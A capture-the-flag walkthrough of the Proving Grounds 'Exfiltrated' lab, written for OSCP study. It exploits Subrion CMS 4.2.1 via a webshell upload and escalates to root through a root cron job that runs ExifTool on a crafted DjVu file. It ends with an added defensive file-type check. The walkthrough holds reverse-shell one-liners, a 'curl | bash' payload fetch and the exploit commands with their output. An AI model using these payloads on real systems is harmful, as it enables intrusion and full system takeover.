Proving Grounds: Exfiltrated

Today we will take a look at Proving Grounds: Exfiltrated. I am sharing this post as part of my preparation for the OSCP exam, and to show you the way if you get stuck. Please try to understand each step and take notes.

22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
| 256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
|_ 256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-generator: Subrion CMS - Open Source Content Management System
| http-robots.txt: 7 disallowed entries
| /backup/ /cron/? /front/ /install/ /panel/ /tmp/
|_http-title: Home :: Powered by Subrion 4.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Add the target to the hosts file.

└─# cat /etc/hosts
localhost
kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
exfiltrated.offsec


Check for default credentials.


Look for an exploit that matches the CMS version.

└─# searchsploit Subrion CMS 4.2.1
Subrion CMS 4.2.1 - Arbitrary File Upload | php/webapps/
└─# searchsploit -m php/webapps/
└─# python -u http://exfiltrated.offsec/panel/ -l admin -p admin
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422
[+] Trying to connect to: http://exfiltrated.offsec/panel/
[+] Success!
[+] Got CSRF token: Y1pnLHaAFll0W1VUW6I7bD0XPpc0iJJ719ZVspL5
[+] Trying to log in...
[+] Login Successful!
[+] Generating random name for Webshell...
[+] Generated webshell name: kobwkomavbmiyio
[+] Trying to Upload Webshell..
[+] Upload Success... Webshell path: http://exfiltrated.offsec/panel/uploads/kobwkomavbmiyio.phar
$ whoami

I get a reverse shell again to upgrade the shell.

└─# cat
bash -i >& /dev/tcp/ 0>&1
└─# python3 -m http.server 80
$ curl | bash
└─# nc -nvlp 4242
listening on [any] 4242 ...
connect to [] from (UNKNOWN) [] 51084
bash: cannot set terminal process group (897): Inappropriate ioctl for device
bash: no job control in this shell
python3 -c 'import pty;pty.spawn("/bin/bash");'
export TERM=xterm
Ctrl + z
stty raw -echo ; fg
reset
www-data@exfiltrated:/var/www/html/subrion/uploads$ cat /etc/crontab
* * * * root bash /opt/image-exif.sh
www-data@exfiltrated:/var/www/html/subrion/uploads$ cat /opt/
#! /bin/bash
#07/06/18 A BASH script to collect EXIF metadata
echo -ne "\\n metadata directory cleaned! \\n\\n"
IMAGES='/var/www/html/subrion/uploads'
META='/opt/metadata'
FILE=`openssl rand -hex 5`
echo -ne "\\n Processing EXIF metadata now... \\n\\n"
ls $IMAGES | grep "jpg" | while read filename;
do
    exiftool "$IMAGES/$filename" >> $LOGFILE
done
echo -ne "\\n\\n Processing is finished! \\n\\n\\n"

Check the version of ExifTool.

www-data@exfiltrated:/var/www/html/subrion/uploads$ exiftool -ver

└─# sudo apt-get update && sudo apt-get install -y djvulibre-bin
└─# cat
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"]);'
└─# cat exploit
(metadata "\c${system ('curl | bash')};")
└─# djvumake exploit.djvu INFO=0,0 BGjp=/dev/null ANTa=exploit
└─# mv exploit.djvu exploit.jpg
└─# nc -nvlp 4444

On the target machine

www-data@exfiltrated:/var/www/html/subrion/uploads$ wget

After a few minutes

└─# nc -nvlp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 48712
/bin/sh: 0: can't access tty; job control turned off
# whoami
# id
uid=0(root) gid=0(root) groups=0(root)
# uname -a
Linux exfiltrated 5.4.0-74-generic #83-Ubuntu SMP Sat May 8 02:35:39 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

And now we are root.
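
Seen from the defender's side, the root cron job above selects files by name (grep "jpg") and hands them to exiftool, so a DjVu file renamed to exploit.jpg is still parsed as DjVu. The following is an added example, not part of the original walkthrough or the box's own script: a shell check that compares each file's magic bytes with its name. The function names and the sample files are constructed for illustration.

```bash
# Added example (not from the original post): flag files that the cron
# script's name-based filter would accept but that are not JPEG by content.

# Print the first $2 bytes of file $1 as lowercase hex, no whitespace.
magic_hex() {
    od -An -tx1 -N "$2" "$1" | tr -d '[:space:]'
}

# True only if the content starts with the JPEG SOI marker ff d8 ff.
is_real_jpeg() {
    [ "$(magic_hex "$1" 3)" = "ffd8ff" ]
}

# True if the content starts with the DjVu container magic "AT&TFORM".
is_djvu() {
    [ "$(magic_hex "$1" 8)" = "41542654464f524d" ]
}

# Apply the same selection rule as the cron script (name contains "jpg"),
# then report every selected file whose content is not JPEG.
# The body runs in a subshell so the loop variable stays local.
scan_uploads() (
    for f in "$1"/*jpg*; do
        [ -f "$f" ] || continue
        if is_djvu "$f"; then
            printf 'DJVU-AS-JPG %s\n' "${f##*/}"
        elif ! is_real_jpeg "$f"; then
            printf 'NOT-JPEG %s\n' "${f##*/}"
        fi
    done
)

# Constructed sample files (not taken from the target) so this runs offline.
make_samples() (
    dir=$(mktemp -d)
    printf '\377\330\377\340constructed-jpeg-body' > "$dir/photo.jpg"
    printf 'AT&TFORM\000\000\000\020DJVUINFO' > "$dir/renamed.jpg"
    printf 'plain text' > "$dir/notes.jpg"
    printf '%s\n' "$dir"
)

samples=$(make_samples)
scan_uploads "$samples"
rm -rf "$samples"
```

A content check like this only detects the mismatch. The underlying problem is a root cron job running a metadata parser over a directory the web server can write to, so the job should also run as an unprivileged user with an up-to-date ExifTool.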

“If you have any questions or comments, please do not hesitate to write. Have a good day.”



Al1z4deh:~# echo "eJPT, CEH, OSCP"

